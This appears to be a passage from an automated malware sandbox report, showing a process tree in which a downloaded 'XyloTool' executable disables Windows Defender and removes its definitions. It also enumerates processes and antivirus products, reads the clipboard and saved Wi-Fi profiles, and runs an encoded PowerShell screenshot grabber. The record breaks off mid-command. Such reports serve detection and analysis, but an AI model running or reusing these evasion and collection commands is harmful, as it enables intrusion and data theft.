C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.12.227401379\727617421" -childID 10 -isForBrowser -prefsHandle 9344 -prefMapHandle 9592 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26127f2f-2a49-436b-b398-eda6ad763ad3} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9740 2fed554a458 tab3⤵PID:5680
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.13.1290499912\583534012" -childID 11 -isForBrowser -prefsHandle 9100 -prefMapHandle 9168 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9fe2a69-2ef6-4496-a760-a8f00c102847} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9092 2fed554cb58 tab3⤵PID:5688
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.14.642554077\2051119939" -childID 12 -isForBrowser -prefsHandle 8744 -prefMapHandle 8748 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2417fe8-6063-45bf-b79a-4183975bd621} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9504 2fed5c6a158 tab3⤵PID:5908
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.15.920982380\996574547" -childID 13 -isForBrowser -prefsHandle 8512 -prefMapHandle 8516 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5859a7ee-39e0-4356-957f-7c77f031626d} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8552 2fed614b258 tab3⤵PID:5168
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.16.689338010\40834246" -childID 14 -isForBrowser -prefsHandle 8496 -prefMapHandle 8492 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0011d17-89d7-4eaa-b403-d7dc6966b1aa} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8480 2fed484d958 tab3⤵PID:6264
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.17.682845685\925525864" -childID 15 -isForBrowser -prefsHandle 8572 -prefMapHandle 8504 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fc82461-87e6-4268-8e9c-438c43b7a3fe} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9568 2fed484be58 tab3⤵PID:6304
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.18.1382773691\1985378191" -childID 16 -isForBrowser -prefsHandle 8104 -prefMapHandle 8108 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56f9be48-b968-4dbf-8294-26f5830de36c} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8096 2fed666d658 tab3⤵PID:6648
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.19.1736049878\1858377365" -childID 17 -isForBrowser -prefsHandle 7876 -prefMapHandle 7872 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2c4455c-ee49-4d66-b744-824d5905de58} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8076 2fed68aaa58 tab3⤵PID:6820
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.20.24613621\1794545916" -childID 18 -isForBrowser -prefsHandle 8160 -prefMapHandle 7848 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {079944ca-a273-409b-90e7-4236f81f7904} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7840 2fed68ab958 tab3⤵PID:6832
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.21.357398867\1418662110" -childID 19 -isForBrowser -prefsHandle 7536 -prefMapHandle 7540 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf40c48f-be26-4f19-8608-6ef7156f7650} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7644 2fed6abba58 tab3⤵PID:6844
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.22.718358192\1718980534" -childID 20 -isForBrowser -prefsHandle 7440 -prefMapHandle 7528 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed80a11e-9f11-4f37-8555-0dff35d1fe47} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7872 2fed6abcc58 tab3⤵PID:6860
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.23.1574448988\1929654738" -childID 21 -isForBrowser -prefsHandle 7276 -prefMapHandle 7776 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81afc695-c950-4080-8563-02c7ef4886c7} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7772 2fed71bde58 tab3⤵PID:6892
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.24.863064804\1537022992" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 8856 -prefMapHandle 6888 -prefsLen 27776 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9aa5918f-fc46-46d0-821e-e7879fca8ff6} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6868 2fed5d8d558 utility3⤵PID:5668
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.25.439946013\530452240" -childID 22 -isForBrowser -prefsHandle 6812 -prefMapHandle 6816 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7017438d-6f4b-4233-8cc2-934cb2a2ac34} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7192 2fed58a8658 tab3⤵PID:5656
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.26.2065785418\1000208025" -childID 23 -isForBrowser -prefsHandle 6624 -prefMapHandle 6620 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81b3afdf-9b5f-4b62-98be-33d418198abd} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6632 2fed5d8fc58 tab3⤵PID:7200
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.27.1308398905\1705913018" -childID 24 -isForBrowser -prefsHandle 6524 -prefMapHandle 6520 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d34bed5b-3989-40a8-b365-6d1b0be5df51} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6536 2fed601c658 tab3⤵PID:7208
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.28.1385589469\12902816" -childID 25 -isForBrowser -prefsHandle 6272 -prefMapHandle 6276 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f075c15-bd15-4cda-b19f-49ca9982c4cb} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6264 2febe940358 tab3⤵PID:7228
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.29.923430430\59486449" -childID 26 -isForBrowser -prefsHandle 4944 -prefMapHandle 10376 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {826d0806-87a2-4f78-8774-8a3bcdc1eea3} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10404 2fed3d62358 tab3⤵PID:8164
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.30.687212624\1877107049" -childID 27 -isForBrowser -prefsHandle 10152 -prefMapHandle 10632 -prefsLen 31301 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {33b24705-447b-4ee5-99fb-5cd8e6eb6140} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10572 2feddb13658 tab3⤵PID:7688
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.31.359620658\229773335" -childID 28 -isForBrowser -prefsHandle 5924 -prefMapHandle 3572 -prefsLen 31301 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82902407-8125-4072-949a-d41f9ac4de56} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10824 2fedebf8958 tab3⤵PID:4500
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.32.1891966997\666259169" -childID 29 -isForBrowser -prefsHandle 10312 -prefMapHandle 10324 -prefsLen 31301 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6b41c96-b6fa-48c4-9ec6-efbfaacc580b} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10300 2fedf978e58 tab3⤵PID:7524
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.33.165701030\877517440" -childID 30 -isForBrowser -prefsHandle 8640 -prefMapHandle 6980 -prefsLen 31397 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e64a8df2-0176-4ab7-bb2d-976018e0fc5e} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10932 2fed0b77b58 tab3⤵PID:1916
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.34.1724721587\413791983" -childID 31 -isForBrowser -prefsHandle 10720 -prefMapHandle 3836 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e748b28b-dc44-495d-9cc7-44fb77058598} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10708 2fed0f8ee58 tab3⤵PID:3524
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.35.195616879\550843068" -childID 32 -isForBrowser -prefsHandle 10848 -prefMapHandle 10832 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91a25632-112b-4bed-95cb-81e2f9f2c27c} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10788 2fed407fb58 tab3⤵PID:7196
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.36.471017351\488335513" -childID 33 -isForBrowser -prefsHandle 10228 -prefMapHandle 5912 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b765b09c-523a-428e-a215-a5040bf5dbcf} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 3112 2fed0de8858 tab3⤵PID:7800
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.37.1930599041\747725068" -childID 34 -isForBrowser -prefsHandle 10224 -prefMapHandle 6420 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c59decf-f162-4658-a7c0-34cf417a7b45} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 4264 2fed0f8dc58 tab3⤵PID:7908
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.38.728469841\746336893" -childID 35 -isForBrowser -prefsHandle 6384 -prefMapHandle 8832 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d34940b5-6e49-481a-b320-a6623b6a5087} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7004 2febe978d58 tab3⤵PID:9004
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1072
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:8144 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\XyloTool.rar2⤵
- Opens file in notepad (likely ransom note)
PID:8164
-
C:\Users\Admin\Downloads\winrar-x64-701.exe"C:\Users\Admin\Downloads\winrar-x64-701.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2000
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\XyloTool.rar1⤵
- Opens file in notepad (likely ransom note)
PID:7700
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\XyloTool.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:7336
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\41984dd47e114aa2859cd35371f64bc8 /t 7244 /p 20001⤵PID:7024
-
C:\Users\Admin\Desktop\XyloTool.exe"C:\Users\Admin\Desktop\XyloTool.exe"1⤵
- Executes dropped EXE
PID:4836 -
C:\Users\Admin\Desktop\XyloTool.exe"C:\Users\Admin\Desktop\XyloTool.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'"3⤵PID:7364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:8072 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:3356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3276 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1452
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1140 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:7428
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4688 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:3180
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:5276
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:5132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:6500 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1420
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:7120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1496
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:7192
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:1808
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4560 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:7212
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3260 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACg